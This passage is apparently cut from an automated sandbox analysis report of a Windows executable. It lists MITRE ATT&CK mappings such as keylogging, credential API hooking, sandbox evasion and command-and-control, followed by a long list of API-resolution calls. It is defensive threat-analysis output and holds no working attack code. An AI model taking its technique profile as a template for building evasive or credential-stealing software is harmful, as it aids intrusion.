"malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 4, "informative_identifiers_count": 17}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1, "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 2, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 4, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "malicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Network Connections Discovery", "attck_id": "T1049", "attck_id_wiki": "https://attack.mitre.org/techniques/T1049", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Clipboard Data", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Email Collection", "attck_id": "T1114", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 6}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 4, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Exfiltration", "technique": "Exfiltration Over C2 Channel", "attck_id": "T1041", "attck_id_wiki": "https://attack.mitre.org/techniques/T1041", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter QueryPerformanceCounter (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetVersion (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter LoadLibraryExA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetThreadLocale (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetCommandLineA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter FindFirstFileA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter FindClose (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter SetEndOfFile (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetStdHandle (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetFileType (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter LoadStringA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter MessageBoxA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter ReleaseMutex (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter MoveFileA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetStringTypeExA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetPrivateProfileStringA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetFullPathNameA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetExitCodeThread (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetDateFormatA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetCurrentDirectoryA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter FormatMessageA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter FindResourceA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter FindNextFileA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter FileTimeToDosDateTime (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter ExitThread (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter VerQueryValueA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoSizeA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter wvsprintfA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter UnregisterClassA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter TranslateMessage (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter 